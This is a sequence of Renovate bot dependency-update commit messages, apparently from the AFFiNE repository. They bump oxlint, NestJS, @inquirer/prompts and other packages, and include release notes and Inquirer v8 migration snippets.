This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [oxlint](https://oxc.rs/docs/guide/usage/linter) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint)) | [`1.66.0` → `1.67.0`](https://renovatebot.com/diffs/npm/oxlint/1.66.0/1.67.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/oxc (oxlint)</summary> ### [`v1.67.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1670---2026-05-26) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.66.0...oxlint_v1.67.0) ##### 🚀 Features - [`b84941e`](https://redirect.github.com/oxc-project/oxc/commit/b84941e) linter/vue: Implement no-expose-after-await rule ([#​22675](https://redirect.github.com/oxc-project/oxc/issues/22675)) (bab) - [`98b98c1`](https://redirect.github.com/oxc-project/oxc/commit/98b98c1) linter/vue: Implement no-computed-properties-in-data rule ([#​22674](https://redirect.github.com/oxc-project/oxc/issues/22674)) (bab) - [`2d4c919`](https://redirect.github.com/oxc-project/oxc/commit/2d4c919) oxlint: Support `vite-plus/resolveConfig` for vite.config.ts ([#​22456](https://redirect.github.com/oxc-project/oxc/issues/22456)) (leaysgur) - [`2a60012`](https://redirect.github.com/oxc-project/oxc/commit/2a60012) linter/vue: Implement require-render-return rule ([#​22613](https://redirect.github.com/oxc-project/oxc/issues/22613)) (bab) - [`9f227fd`](https://redirect.github.com/oxc-project/oxc/commit/9f227fd) linter/vue: Implement no-deprecated-props-default-this rule ([#​21892](https://redirect.github.com/oxc-project/oxc/issues/21892)) (bab) - [`87f065e`](https://redirect.github.com/oxc-project/oxc/commit/87f065e) linter/vue: Implement return-in-emits-validator rule ([#​21935](https://redirect.github.com/oxc-project/oxc/issues/21935)) (bab) - [`ea0380c`](https://redirect.github.com/oxc-project/oxc/commit/ea0380c) linter/unicorn: Implement `import-style` rule ([#​22173](https://redirect.github.com/oxc-project/oxc/issues/22173)) (Hao Chen) - [`dde40fe`](https://redirect.github.com/oxc-project/oxc/commit/dde40fe) linter/vue: Implement no-watch-after-await rule ([#​22006](https://redirect.github.com/oxc-project/oxc/issues/22006)) (bab) - [`a735eb0`](https://redirect.github.com/oxc-project/oxc/commit/a735eb0) linter/vue: Implement valid-next-tick rule ([#​22531](https://redirect.github.com/oxc-project/oxc/issues/22531)) (bab) - [`6dc615d`](https://redirect.github.com/oxc-project/oxc/commit/6dc615d) linter/vue: Implement no-shared-component-data rule ([#​21842](https://redirect.github.com/oxc-project/oxc/issues/21842)) (bab) - [`a656418`](https://redirect.github.com/oxc-project/oxc/commit/a656418) linter/vue: Implement valid-define-options rule ([#​22107](https://redirect.github.com/oxc-project/oxc/issues/22107)) (bab) - [`bb6f1b2`](https://redirect.github.com/oxc-project/oxc/commit/bb6f1b2) linter/vue: Implement require-slots-as-functions rule ([#​22244](https://redirect.github.com/oxc-project/oxc/issues/22244)) (bab) - [`5fa4774`](https://redirect.github.com/oxc-project/oxc/commit/5fa4774) linter/n: Implement `callback-return` rule ([#​22470](https://redirect.github.com/oxc-project/oxc/issues/22470)) (Mikhail Baev) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDIuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwMi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f5fc7c8c00 |
chore: bump up eslint-plugin-oxlint version to v1.67.0 (#15036)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.66.0` → `1.67.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.66.0/1.67.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary> ### [`v1.67.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.67.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7d3e38d652 |
chore: bump up nestjs (#15035)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs-cls/transactional](https://papooch.github.io/nestjs-cls/) ([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`3.2.0` → `3.2.1`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional/3.2.0/3.2.1) |  |  | | [@nestjs-cls/transactional-adapter-prisma](https://papooch.github.io/nestjs-cls/) ([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`1.3.4` → `1.3.5`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.4/1.3.5) |  |  | | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.23/11.1.24) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.23/11.1.24) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.23/11.1.24) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.23/11.1.24) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.23/11.1.24) |  |  | --- ### Release Notes <details> <summary>Papooch/nestjs-cls (@​nestjs-cls/transactional)</summary> ### [`v3.2.1`](https://redirect.github.com/Papooch/nestjs-cls/releases/tag/v3.2.1) [Compare Source](https://redirect.github.com/Papooch/nestjs-cls/compare/@nestjs-cls/transactional@3.2.0...@nestjs-cls/transactional@3.2.1) - fix: `has` method respects falsy values ([#​57](https://redirect.github.com/Papooch/nestjs-cls/issues/57)) [`69f06e7`](https://redirect.github.com/Papooch/nestjs-cls/commit/69f06e7) </details> <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) </details> <details> <summary>nestjs/nest (@​nestjs/core)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) </details> <details> <summary>nestjs/nest (@​nestjs/platform-express)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) </details> <details> <summary>nestjs/nest (@​nestjs/platform-socket.io)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) ##### v11.1.24 (2026-05-25) ##### Bug fixes - `core` - [#​17009](https://redirect.github.com/nestjs/nest/pull/17009) fix(core): reset dependency-tree cache on metadata changes ([@​puneetdixit200](https://redirect.github.com/puneetdixit200)) ##### Enhancements - `core` - [#​16997](https://redirect.github.com/nestjs/nest/pull/16997) feat(core): warn on late websocket adapter registration ([@​hbinhng](https://redirect.github.com/hbinhng)) ##### Dependencies - `platform-ws` - [#​17011](https://redirect.github.com/nestjs/nest/pull/17011) chore(deps): bump ws from 8.20.1 to 8.21.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot)) ##### Committers: 2 - Nguyễn Hải Bình ([@​hbinhng](https://redirect.github.com/hbinhng)) - Puneet Dixit ([@​puneetdixit200](https://redirect.github.com/puneetdixit200)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
2bd920fea6 |
chore: bump up @inquirer/prompts version to v8 (#15025)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@inquirer/prompts](https://redirect.github.com/SBoudrias/Inquirer.js/blob/main/packages/prompts/README.md) ([source](https://redirect.github.com/SBoudrias/Inquirer.js)) | [`^7.10.1` → `^8.0.0`](https://renovatebot.com/diffs/npm/@inquirer%2fprompts/7.10.1/8.5.0) |  |  | --- ### Release Notes <details> <summary>SBoudrias/Inquirer.js (@​inquirer/prompts)</summary> ### [`v8.5.0`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...5ca6d1101d5d3f8fb066cd5b389bccfdafbbe0c0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...@inquirer/prompts@8.5.0) ### [`v8.4.3`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.3) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.2...@inquirer/prompts@8.4.3) - Fix: Windows rendering bug - Fix: Preserve exact literal types in `choices` array (Typescript only) - Fix: Allow input `default` value to be of type `undefined` (Typescript only) - Bump dependencies ### [`v8.4.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.1...@inquirer/prompts@8.4.2) - Fix: some Windows terminals would freeze and not react to keypresses. ### [`v8.4.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.0...@inquirer/prompts@8.4.1) - Improve `expand` prompt type inferrence. ### [`v8.4.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.2...@inquirer/prompts@8.4.0) - Feat: Added a loading message while validating editor prompt input. - Type improvement: Better type inference with checkbox, search and expand prompts. - Fix: `editor` prompt not always properly handling editor path on windows. ### [`v8.3.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.1...@inquirer/prompts@8.3.2) - Fix broken 8.3.1 release process. ### [`v8.3.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.0...@inquirer/prompts@8.3.1) - Bump dependencies ### [`v8.3.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.1...@inquirer/prompts@8.3.0) - Fix: Keypresses happening before a prompt is rendered are now ignored. - Fix (checkbox): Element who're both checked and disabled are now always included in the returned array. - Feat (select/checkbox): Cursor will now hover disabled options of the list; but they still cannot be interacted with. This prevents the cursor jumping ahead in ways that can be confusing. - Feat: various new theme options to make all prompts content localizable. Finally, see our new [`@inquirer/i18n` package](https://redirect.github.com/SBoudrias/Inquirer.js/tree/main/packages/i18n)! ### [`v8.2.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.0...@inquirer/prompts@8.2.1) - chore: Switch `wrap-ansi` with `fast-wrap-ansi` ### [`v8.2.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.1.0...@inquirer/prompts@8.2.0) - feat(`search`): Add support for `default`. - feat(`rawlist`): Add support for `description` of choices. That information is displayed under the list when the choice is highlighted. - Bump dependencies ### [`v8.1.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.1.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.2...@inquirer/prompts@8.1.0) - Feat: `rawlist` now supports `default` option. - Fix: `select` now infer return type properly when passing a `choices` array of string literals. ### [`v8.0.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.1...@inquirer/prompts@8.0.2) - Fix Typescript not discovering types when `moduleResolution` is set to `commonjs` (you probably want to fix that in your project if it's still in your tsconfig) ### [`v8.0.1`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) ### [`v8.0.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@7.10.1...@inquirer/prompts@8.0.0) ### Release Notes #### 🚨 Breaking Changes This is a major release that modernizes the codebase for Node.js ≥ 20. ##### ESM Only - No More CommonJS Support **Impact:** All packages are now ESM-only. CommonJS imports are no longer supported. If you're on modern Node versions (≥ 20), this should be transparent and have no impact. ##### Node.js Version Requirement **Minimum Node.js version is now 20.x** Node.js versions below 20 are no longer supported. Please upgrade to Node.js 20 or later. Node min versions: `>=23.5.0 || ^22.13.0 || ^21.7.0 || ^20.12.0` ##### Deprecated APIs Removed The following deprecated APIs have been removed after being deprecated in previous releases: ##### `list` prompt alias removed (affects `inquirer` package only) The `list` alias has been removed from the `inquirer` package. This only impacts users of the legacy `inquirer` package, not users of `@inquirer/prompts` or individual prompt packages. ```js // ❌ No longer available (inquirer package only) import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'list', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); // ✅ Use 'select' instead import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'select', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); ``` ##### `helpMode` theme property removed ```js // ❌ No longer available const answer = await select({ theme: { helpMode: 'never' } }); // ✅ Use theme.style.keysHelpTip instead const answer = await select({ theme: { style: { keysHelpTip: () => undefined // or your custom styling function } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `instructions` config property removed ```js // ❌ No longer available const answer = await checkbox({ instructions: 'Custom instructions' }); // ✅ Use theme.style.keysHelpTip instead const answer = await checkbox({ theme: { style: { keysHelpTip: (text) => 'Custom instructions' } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `cancel()` method removed The `cancel()` method on prompt return custom `Promise` has been removed. ```js // ❌ No longer available const answerPromise = input({ message: 'Name?' }); answerPromise.cancel(); const answer = await answerPromise; // ✅ Use AbortSignal instead const controller = new AbortController(); const answer = await input( { message: 'Name?' }, { signal: controller.signal } ); controller.abort(); ``` ##### Color Library Change: yoctocolors → Node.js `styleText` **Internal change:** The project now uses Node.js built-in `util.styleText()` instead of the `yoctocolors` package for terminal colors. This makes Inquirer smaller and reduces risks of vulnerabilities coming from transitive dependencies. </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b3b9c54a89 |
chore: bump up @types/nodemailer version to v8 (#15026)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer)) | [`^7.0.0` → `^8.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/7.0.9/8.0.0) |  |  | --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
4f14e8840c |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.74.0" (#15024)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.73.0"` → `from: "5.74.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.74.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0) ### [`v5.73.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5731) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.0...5.73.1) #### 5.73.1 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
95dd8d03be |
chore: bump up nestjs (#15023)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) | [`13.4.1` → `13.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.4.1/13.4.2) |  |  | | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.21` → `11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.21/11.1.23) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.21` → `11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.21/11.1.23) |  |  | | [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) | [`13.4.1` → `13.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.4.1/13.4.2) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.21` → `11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.21/11.1.23) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.21` → `11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.21/11.1.23) |  |  | | [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.4.3` → `11.4.4`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.3/11.4.4) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.21` → `11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.21/11.1.23) |  |  | --- ### Release Notes <details> <summary>nestjs/graphql (@​nestjs/apollo)</summary> ### [`v13.4.2`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.2) [Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.4.1...v13.4.2) ##### v13.4.2 (2026-05-21) ##### Bug fixes - `graphql` - [#​4007](https://redirect.github.com/nestjs/graphql/pull/4007) fix(graphql): preserve PickType fields for dual-decorated inputs ([@​yudin-s](https://redirect.github.com/yudin-s)) ##### Committers: 1 - Serge Yudin ([@​yudin-s](https://redirect.github.com/yudin-s)) </details> <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.23`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.23) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.22...v11.1.23) ##### v11.1.23 (2026-05-21) ##### Bug fixes - `core` - [#​16998](https://redirect.github.com/nestjs/nest/issues/16998) fix snapshot: true eagerly instantiates Terminus transient indicators since 11.1.20 ##### Committers: 1 - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) ### [`v11.1.22`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.22) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.21...v11.1.22) ##### v11.1.22 (2026-05-21) ##### Bug fixes - `core` - [#​16993](https://redirect.github.com/nestjs/nest/pull/16993) fix(core): inflight request injection bug [#​16989](https://redirect.github.com/nestjs/nest/issues/16989) ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) ##### Enhancements - `core` - [#​16967](https://redirect.github.com/nestjs/nest/pull/16967) fix(core): identify decorator type in invalid-class-module error ([@​HarrierOnChain](https://redirect.github.com/HarrierOnChain)) - ##### Committers: 2 - Harrier ([@​HarrierOnChain](https://redirect.github.com/HarrierOnChain)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) </details> <details> <summary>nestjs/swagger (@​nestjs/swagger)</summary> ### [`v11.4.4`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.4) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.4.3...11.4.4) #### 11.4.4 (2026-05-21) ##### Bug fixes - [#​3930](https://redirect.github.com/nestjs/swagger/pull/3930) fix: top-level nullable with discriminator issue ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) ##### Enhancements - [#​3921](https://redirect.github.com/nestjs/swagger/pull/3921) feat(swagger): add summary field to Tag Object (OpenAPI 3.2) ([@​frbuceta](https://redirect.github.com/frbuceta)) - [#​3924](https://redirect.github.com/nestjs/swagger/pull/3924) feat(swagger): warn when [@​ApiTags](https://redirect.github.com/ApiTags) receives hierarchy fields ([@​frbuceta](https://redirect.github.com/frbuceta)) - [#​3925](https://redirect.github.com/nestjs/swagger/pull/3925) fix(swagger): type Tag Object kind as a free-form string ([@​frbuceta](https://redirect.github.com/frbuceta)) ##### Committers: 4 - Alexander Scholz ([@​LucidityDesign](https://redirect.github.com/LucidityDesign)) - Francisco Buceta ([@​frbuceta](https://redirect.github.com/frbuceta)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) - Natanael dos Santos Feitosa ([@​natanfeitosa](https://redirect.github.com/natanfeitosa)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
adfa51a372 |
chore: bump up oxlint version to v1.66.0 (#14974)
